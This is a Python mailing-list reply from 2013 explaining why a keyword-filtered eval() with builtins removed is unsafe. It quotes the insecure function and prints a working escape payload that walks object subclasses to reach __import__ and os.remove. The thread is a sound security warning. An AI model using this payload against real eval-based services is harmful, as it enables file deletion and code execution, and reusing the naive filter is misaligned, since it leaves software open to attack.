Path: csiph.com!v102.xanadu-bbs.net!xanadu-bbs.net!eternal-september.org!feeder.eternal-september.org!newsfeed101.telia.com!starscream.dk.telia.net!news.tele.dk!news.tele.dk!small.news.tele.dk!newsgate.cistron.nl!newsgate.news.xs4all.nl!post.news.xs4all.nl!not-for-mail
Return-Path: <chris@rebertia.com>
X-Original-To: python-list@python.org
Delivered-To: python-list@mail.python.org
X-Spam-Status: OK 0.000
X-Spam-Evidence: '*H*': 1.00; '*S*': 0.00; 'context': 0.05; 'modified': 0.05; 'python3': 0.05; 'badly': 0.07; 'defines': 0.07; 'expressions': 0.07; 'interpreter.': 0.07; 'url:blog': 0.09; 'python': 0.09; 'assembler': 0.09; 'dict': 0.09; 'globals': 0.09; 'similar,': 0.09; '{})': 0.09; 'cc:addr:python-list': 0.10; 'looked': 0.10; 'def': 0.10; '"right"': 0.16; 'expr': 0.16; 'string': 0.17; 'wrote:': 0.17; 'integer': 0.17; 'thu,': 0.17; 'jan': 0.18; '>>>': 0.18; 'written': 0.20; '2.x': 0.22; '4.0': 0.22; 'basis,': 0.22; 'names.': 0.22; 'cheers,': 0.23; 'cc:2**0': 0.23; "i've": 0.23; 'raise': 0.24; 'cc:no real name:2**0': 0.24; 'cc:addr:python.org': 0.25; 'header:In-Reply-To:1': 0.25; 'values': 0.26; 'possible,': 0.27; 'message-id:@mail.gmail.com': 0.27; 'rest': 0.28; 'chris': 0.28; 'arithmetic': 0.29; "skip:' 70": 0.29; 'probably': 0.29; 'skip:( 40': 0.30; 'compatible': 0.30; 'code': 0.31; 'symbol': 0.33; 'values.': 0.33; 'likely': 0.33; 'received:google.com': 0.34; 'nov': 0.35; 'pm,': 0.35; 'table': 0.35; 'similar': 0.35; 'received:209.85': 0.35; 'but': 0.36; 'apple': 0.36; 'skip:{ 10': 0.36; 'itself': 0.37; 'received:209': 0.37; 'subject:: ': 0.38; 'skip:( 30': 0.38; 'skip:l 20': 0.38; 'header:Received:5': 0.40; 'back': 0.62; 'evaluate': 0.62; 'more': 0.63; 'article': 0.78; '2013': 0.84; '4.2.1': 0.84; 'locals': 0.84; 'sender:addr:chris': 0.84; 'working,': 0.84; 'edwards': 0.91; 'to:none': 0.93
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=rebertia.com; s=google; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:cc:content-type; bh=6oVA1n9vNzRWDAYj9mTkKHHc8OW1n/gs6qHaDLjho7I=; b=QU4LetSq9OkhJrWd++JkoIAKKTHVBiUxYi0mxznDTRmgkxiXKeHSLwy+DUtEr1nS+Q hKSuFLUQe3WX3ULsDMpK6wflMR9tdsX/8xMRqKg9dBrwUO7na4BHOHxFivXLAlsTL9S1 LE5/XebWvoYM4pwLNs79cMXku03TP4BF7pask=
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=20120113; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:cc:content-type :x-gm-message-state; bh=6oVA1n9vNzRWDAYj9mTkKHHc8OW1n/gs6qHaDLjho7I=; b=NWkBkTBC6fPt1RcuGh0Gt+VY7+pnHI0AVuu08ItlGLv0X8tdcvoy4XsDg6F+jFM1sZ aM1Vo2NosoU/lglHB/aGGMkLCWwki8WtFXIjRsKBXYjGNCNEe5NBRKcCrZNoVEjfysMc dMqDgYaat55+ywasTr9ivxzf0kOC9P7V4Fo9YL9vPauym5QRug9y+jjpasuq89HSYqlg e6exHTx/rsXDpgIaP3dVIayg4ApwEMlEYEohc824FDk6Cbd7lFjvIrRcdhso3mz03PW+ tNEL4DQRYaNSijFiE95j4pfp73aSzaRLsSOKutN1KL5dvrnus6y1wovqE8LbJF8uQAJz 91Rw==
MIME-Version: 1.0
Sender: chris@rebertia.com
In-Reply-To: <kc541v$3e4$1@reader1.panix.com>
References: <kc541v$3e4$1@reader1.panix.com>
Date: Thu, 3 Jan 2013 23:50:31 -0800
X-Google-Sender-Auth: 6jV0r6lniQ9BPfIiq58f0qciHBQ
Subject: Re: Yet another attempt at a safe eval() call
From: Chris Rebert <clp2@rebertia.com>
Cc: python-list@python.org
Content-Type: text/plain; charset=UTF-8
X-Gm-Message-State: ALoCoQkj+6MNm/SJqjY25004Nnt+WU+W+nfLGe0BxZau5mqPbUJvCgMRtb5kk92Z6YimCnumF1j5
X-BeenThere: python-list@python.org
X-Mailman-Version: 2.1.15
Precedence: list
List-Id: General discussion list for the Python programming language <python-list.python.org>
List-Unsubscribe: <http://mail.python.org/mailman/options/python-list>, <mailto:python-list-request@python.org?subject=unsubscribe>
List-Archive: <http://mail.python.org/pipermail/python-list/>
List-Post: <mailto:python-list@python.org>
List-Help: <mailto:python-list-request@python.org?subject=help>
List-Subscribe: <http://mail.python.org/mailman/listinfo/python-list>, <mailto:python-list-request@python.org?subject=subscribe>
Newsgroups: comp.lang.python
Message-ID: <mailman.72.1357285841.2939.python-list@python.org>
Lines: 44
NNTP-Posting-Host: 2001:888:2000:d::a6
X-Trace: 1357285841 news.xs4all.nl 6930 [2001:888:2000:d::a6]:37754
X-Complaints-To: abuse@xs4all.nl
Xref: csiph.com comp.lang.python:36102

On Thu, Jan 3, 2013 at 3:25 PM, Grant Edwards <invalid@invalid.invalid> wrote:
>
> I've written a small assembler in Python 2.[67], and it needs to
> evaluate integer-valued arithmetic expressions in the context of a
> symbol table that defines integer values for a set of names.  The
> "right" thing is probably an expression parser/evaluator using ast,
> but it looked like that would take more code that the rest of the
> assembler combined, and I've got other higher-priority tasks to get
> back to.
>
> How badly am I deluding myself with the code below?

Given http://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html
and similar, I suspect the answer is "a fair bit".

> def lessDangerousEval(expr):
>     global symbolTable
>     if 'import' in expr:
>         raise ParseError("operand expressions are not allowed to contain the string 'import'")
>     globals = {'__builtins__': None}
>     locals  = symbolTable
>     return eval(expr, globals, locals)
>
> I can guarantee that symbolTable is a dict that maps a set of string
> symbol names to integer values.

Using the aformentioned article as a basis, I was able to get this
doozy working, albeit under Python 3:

$ python3
Python 3.3.0 (default, Nov  4 2012, 17:47:16)
[GCC 4.2.1 Compatible Apple Clang 4.0 ((tags/Apple/clang-421.0.57))] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> expr = "[klass for klass in ().__class__.__bases__[0].__subclasses__() if klass.__name__ == 'Codec'][0].encode.__globals__['__builtins__']['__im'+'port__']('os').remove"
>>> eval(expr, {'__builtins__': None}, {})
<built-in function remove>
>>>

Since the original attack was itself devised against Python 2.x, it's
highly likely that similar convoluted attacks against 2.x remain
possible, unless perhaps you were use a modified interpreter.

Cheers,
Chris